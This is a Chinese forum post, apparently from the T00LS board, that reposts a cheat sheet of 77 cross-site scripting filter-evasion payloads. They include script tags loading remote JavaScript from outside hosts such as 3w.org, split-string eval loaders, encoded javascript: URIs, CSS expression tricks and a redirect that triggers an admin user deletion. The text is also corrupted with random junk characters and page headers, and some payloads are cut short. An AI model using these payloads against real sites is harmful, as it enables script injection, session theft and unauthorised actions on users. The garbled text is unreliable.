貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。' v B1 b. h' c" [6 }# s- O7 p
(1)普通的XSS JavaScript注入# \! g& S7 i0 B1 [; M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; S8 a, E: l- S4 f$ e# O" s(2)IMG标签XSS使用JavaScript命令
2 Y2 |7 {5 r# A* A<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 y. p1 l) b4 C3 t# h. j(3)IMG标签无分号无引号- c j9 c2 m7 F* j% A
<IMG SRC=javascript:alert(‘XSS’)>" F9 C* t# p7 x3 b5 q2 u$ j
(4)IMG标签大小写不敏感
& Z+ ^+ G& t# {<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! A9 C( W: k# k1 s& [(5)HTML编码(必须有分号)
' }4 n7 y9 y& Y& |5 V<IMG SRC=javascript:alert(“XSS”)> o1 P: \8 i8 R$ `
(6)修正缺陷IMG标签 g0 d9 ~) B, ]. G8 n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>" ]+ P9 i4 W- J5 M0 ` i+ L8 O5 V
! P+ E, K' q9 j: |% t: N
+ O4 l/ U- j! ~! J F& y
(7)formCharCode标签(计算器)
* K+ n- l2 H' f. |<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>% t% t& B8 j" `. |
(8)UTF-8的Unicode编码(计算器)
( n) j, ?0 q- N8 Y3 o<IMG SRC=jav..省略..S')>/ F8 }2 h. z' ]+ l. _! ]
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)+ z- \& Y- [) j. U0 U' \# r
<IMG SRC=jav..省略..S')>
6 @( E' p0 U' A& Q. g(10)十六进制编码也是没有分号(计算器)
6 r) A" t; c+ W5 A: H" ]<IMG SRC=java..省略..XSS')>
- t! j0 W i% J" O4 w6 \4 p(11)嵌入式标签,将Javascript分开
4 a# m1 }! {, r! @# X<IMG SRC=”jav ascript:alert(‘XSS’);”>8 L$ F9 } U+ C9 t" k, d7 \2 [
(12)嵌入式编码标签,将Javascript分开8 t; S1 N9 Q; p/ x- Y, L' G
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 N0 I# `2 k+ f: t* @(13)嵌入式换行符& H+ \$ ?4 y# S7 ~4 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; [: ?( ~' g( H0 a N1 r- o0 I(14)嵌入式回车2 B! v! s9 {% b* W* w1 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 x# |. L* C9 ](15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ |' V* i1 S: K& X% [1 U, F! Q7 H<IMG SRC=”javascript:alert(‘XSS‘)”>; T% h% ?' J7 N, N4 F5 ^
(16)解决限制字符(要求同页面)
' D) s1 e1 ]: }8 L& M/ j<script>z=’document.’</script>
' G* I" B0 o2 @) a2 z( ?2 I<script>z=z+’write(“‘</script>0 B( v( x+ B3 A
<script>z=z+’<script’</script>
! v. T% X# j: r2 n. I5 X<script>z=z+’ src=ht’</script>4 f& U2 h7 X9 S7 L3 S$ c X
<script>z=z+’tp://ww’</script>
7 P r$ D" s/ V2 h5 X<script>z=z+’w.shell’</script>0 W* u& s$ y2 h9 d
<script>z=z+’.net/1.’</script>
) b0 x7 s8 q+ V; }( m! v9 [<script>z=z+’js></sc’</script>
$ t) Y+ Q: t* I. Y7 [<script>z=z+’ript>”)’</script>. Z. M' @8 o6 V9 p/ E" s9 _2 y
<script>eval_r(z)</script>
! Z" @7 U7 R) e1 G(17)空字符12-7-1 T00LS - Powered by Discuz! Board
' T; c6 C; r; y: e4 Phttps://www.t00ls.net/viewthread ... table&tid=15267 2/64 [) y. V9 J% q3 G
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ t/ S: |$ n) A3 h b( v3 J" X(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) A- j: ~6 P, a" [; M
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
1 s* d1 E( H) {8 v& V5 @(19)Spaces和meta前的IMG标签7 w2 l% h- ^. [* Q
<IMG SRC=” javascript:alert(‘XSS’);”>
8 M2 S y# f# f+ g+ Z+ a(20)Non-alpha-non-digit XSS4 b- z; Q! I* r3 }
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 m* h+ e& C8 {
(21)Non-alpha-non-digit XSS to 2
3 w T i2 M2 f) J<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>- z E, o/ L6 `2 h
(22)Non-alpha-non-digit XSS to 3
( w- h" C, d* x2 K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" w. }- ~9 g% T' }; I0 N
(23)双开括号
$ y5 q1 Y2 s/ M; F" Z8 K+ z( I; B<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; s+ a% o* Q4 b. G& C( M(24)无结束脚本标记(仅火狐等浏览器)
2 Y, o0 e8 ?+ n3 |$ Q<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ S" B/ v0 o% Z1 _(25)无结束脚本标记2
* `9 Q0 [" b7 v! x }0 C<SCRIPT SRC=//3w.org/XSS/xss.js>
, v7 ?& h8 ]0 F5 q7 _6 m$ E(26)半开的HTML/JavaScript XSS
% e0 Q* r. T! R<IMG SRC=”javascript:alert(‘XSS’)”
x1 I. o; o2 E0 m. `' m(27)双开角括号0 h3 a% W: [+ M
<iframe src=http://3w.org/XSS.html <
/ e+ X. C. b& [; ]% ](28)无单引号 双引号 分号
& \ O, h' N* `" H<SCRIPT>a=/XSS/
3 _# g- h3 H aalert(a.source)</SCRIPT>
; a" r) z$ I4 ^/ K) u' s(29)换码过滤的JavaScript
" G! q1 G' e# S( C\”;alert(‘XSS’);//' K/ o8 p% ~( L
(30)结束Title标签' u0 Z0 P2 M& Y F
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( j9 m3 x1 |. C, C" v(31)Input Image9 F- c. m" a3 L0 k; E
<INPUT SRC=”javascript:alert(‘XSS’);”>& I( L1 }) M( u/ g$ j
(32)BODY Image+ I/ h. [- w* _4 p
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>9 n+ |3 ^8 `$ z
(33)BODY标签
2 I: _6 D- {; F9 u9 f1 }<BODY(‘XSS’)>- O% V- I# |4 s
(34)IMG Dynsrc
+ }2 z' X# M. `' y1 H8 I<IMG DYNSRC=”javascript:alert(‘XSS’)”>
1 E2 W2 Z( z9 S& l(35)IMG Lowsrc2 Y% [5 B' ~. |
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 C9 ~, A" k9 h! k# E, b& Q" }# d% U(36)BGSOUND
" k' t2 N$ W! h) j; u<BGSOUND SRC=”javascript:alert(‘XSS’);”>
# D' G5 M& x5 E9 W9 k(37)STYLE sheet) V3 y4 W4 d5 D( ]* F( b
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) U2 P2 A+ @0 |0 Y% i/ F" _4 y5 D( w
(38)远程样式表0 @; p. X+ w3 _; E. t- s& F
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>! f. V# i( r/ a* O# \! @0 @
(39)List-style-image(列表式)# N7 K5 D5 j `( ~5 l: j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 P3 _1 p v5 c% z, ~& U% x(40)IMG VBscript% Q3 t) c* l9 F) q
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS( C: F5 i7 A. j/ T5 S# R2 C0 g
(41)META链接url
) \# a- ^# d7 v: m2 O$ z
5 O. F7 b8 T$ L, E7 d
% C7 y+ g0 s$ i3 L- T% g( X<META HTTP-EQUIV=”refresh” CONTENT=”0;1 w& p3 W' [( S8 _9 ]
URL=http://;URL=javascript:alert(‘XSS’);”>4 w: z) p4 Z3 y' g. j" K
(42)Iframe* Z3 i9 D( o, v& E' F s9 K: M2 c
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 C- D E% }+ q(43)Frame9 f0 V `$ f s4 n
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board% r' X& C2 a5 O, D, L7 x
https://www.t00ls.net/viewthread ... table&tid=15267 3/64 E, w0 \* t# n2 k; Q. f- P
(44)Table6 q! V5 e( D0 \0 B; w5 b; ?3 _
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 c/ @! s0 a$ ~# r( M( W: V0 T(45)TD
/ Z" T$ M* d5 m1 n* S8 A<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
& ]8 g# ]. i; o5 ?" s$ w5 K(46)DIV background-image. w$ o7 j! f5 _% @
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 M& m+ ~+ y* l, u(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-# o4 A( v/ i3 |" K, o# I
8&13&12288&65279)% e, B( o: L, w. z5 t5 U9 V
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 m0 p# t. y+ ~4 p: @& g
(48)DIV expression
7 o0 D7 ]$ \; W; y<DIV STYLE=”width: expression_r(alert(‘XSS’));”>: o, D! @, t* V
(49)STYLE属性分拆表达
8 x$ _6 v( k$ X o- B, L<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
, p5 Y' Q) c7 u! A! M(50)匿名STYLE(组成:开角号和一个字母开头)
8 ]3 q% k9 r' g' D- Z3 v<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
. s0 y% b, j& C# L5 h/ i$ A(51)STYLE background-image
0 |8 Z* N7 j7 L5 J5 c* E; U/ r<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A1 R2 V: v/ l0 Q7 e7 L) w- ^
CLASS=XSS></A>* W9 {- b; V* B' ~) w
(52)IMG STYLE方式. n) b+ A0 Z8 q" I& ^
exppression(alert(“XSS”))’>
' \1 E7 ]5 r- N2 W" }(53)STYLE background' S9 ?& n6 x2 Z/ Y+ N
<STYLE><STYLE
. F+ {7 |0 ^ b v9 H. [2 Ftype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
4 z: ^- E# `& B7 p* s(54)BASE
" h6 S1 i$ j% Z- X& K; A<BASE HREF=”javascript:alert(‘XSS’);//”>
% S/ |* X' x3 S8 b+ j* f(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ y# J' h/ y8 `# U2 q<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>. A! c' i; Y2 [4 @. f K( B
(56)在flash中使用ActionScrpt可以混进你XSS的代码
# F- K( U e) d' F: Fa=”get”;
9 c) i) Z% F4 ^5 W) T8 G; k5 eb=”URL(\”";7 } x* c! A" W7 M# u
c=”javascript:”;( Y$ O: A1 {/ j- n- K6 f6 j
d=”alert(‘XSS’);\”)”; f' @# s2 v. o t# `
eval_r(a+b+c+d);, q* N4 \# B0 h! z" z/ p* Z# m2 g
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上0 W- H5 U- a. V2 @9 t: ]' i, [
<HTML xmlns:xss>; f% R. c1 Z' s2 }1 X
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% D% k3 A4 \. ?0 g2 Z% h0 v$ t<xss:xss>XSS</xss:xss>
% ]3 `+ e: X9 f- l' ~, D) J) P</HTML>
+ g1 W {* x" ]* j(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
8 t5 m# r5 d! c; h- V% Z( Y<SCRIPT SRC=””></SCRIPT>5 \6 j* d/ V8 V! N, _, B8 x/ y
(59)IMG嵌入式命令,可执行任意命令
% h2 j$ _# Y; y7 B6 |<IMG SRC=”http://www.XXX.com/a.php?a=b”>
6 B5 w* P3 _) [(60)IMG嵌入式命令(a.jpg在同服务器)
4 F6 e- H. ~. m9 qRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser6 [2 f$ ^ J: e9 n5 N
(61)绕符号过滤6 ~& C# q# b' l9 J
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ u: Z8 P" `) h- N: R4 G7 s4 h2 l" n(62)& m8 R2 E& q& A
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>' A, W* x1 v- z0 m. Q1 G" F$ q
(63)
4 g, t0 C; F5 ]! f+ b<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ n0 q) E- h5 L5 @ Z3 E4 j+ m/ g(64)
/ |2 [" o. K/ \4 E<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 z" G# v0 a8 t4 j(65)9 E; ^4 `4 W1 M( T! f0 W
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- u+ [: }9 x8 t5 {
(66)12-7-1 T00LS - Powered by Discuz! Board
, U" t- n- L! Y/ y7 z/ t, Y# W ^https://www.t00ls.net/viewthread ... table&tid=15267 4/6
+ g# S. f; t0 r- L: [3 f$ s<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>& z1 L+ {. T6 e9 }
(67). t# S9 Y3 o: ?4 A
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>! _1 l- P. _# b, u" u+ M
</SCRIPT>+ w$ T5 `4 h; y9 K& M* x$ F
(68)URL绕行
' S4 T1 N& V/ u3 s4 f. Q$ V" j<A HREF=”http://127.0.0.1/”>XSS</A>( o9 A) R. Y) J! A- `; I' K9 I" f+ a
(69)URL编码
$ }& f3 }1 g# y8 Q" e8 b<A HREF=”http://3w.org”>XSS</A>- M: m! p- ^7 C4 O4 `" S# @' \
(70)IP十进制
6 z2 `0 ?3 f# M( R9 c2 c<A HREF=”http://3232235521″>XSS</A>9 D" E: G2 B: w( i& ]
(71)IP十六进制
; {5 T) k0 }7 s" W" S+ ^<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 t- e# |% g" |2 N
(72)IP八进制% v; ~8 U$ @. Q+ `) \4 _9 e
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
. o1 e/ E2 u" n$ e8 U8 ~! N0 w(73)混合编码
, }/ x7 H: O7 u+ m+ N8 V<A HREF=”h/ c% k5 z! x5 r
tt p://6 6.000146.0×7.147/”">XSS</A>; Z! ~6 G4 A7 Q, e. Z8 G8 ]+ Y
(74)节省[http:]* H6 ?7 y5 E: l" [
<A HREF=”//www.google.com/”>XSS</A>
: p0 b; r! j c3 C# T- k9 y$ v1 J3 i. p(75)节省[www]
3 d6 g4 x3 k' ~, O) V$ |<A HREF=”http://google.com/”>XSS</A>( [2 a2 c$ S N& F4 O
(76)绝对点绝对DNS
! {' l! |; t+ B( ]% m<A HREF=”http://www.google.com./”>XSS</A>- |0 y1 R! q1 a; N) ^, M1 G
(77)javascript链接" P9 @5 }% \) i$ |. L& j9 u' {+ u
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( f u& v1 }$ N* T+ c3 n# M
8 z- [' p* ^4 u! V: p7 O原文地址:http://fuzzexp.org/u/0day/?p=14
# V q J' x: _, A" \
2 I5 w" c2 M4 G |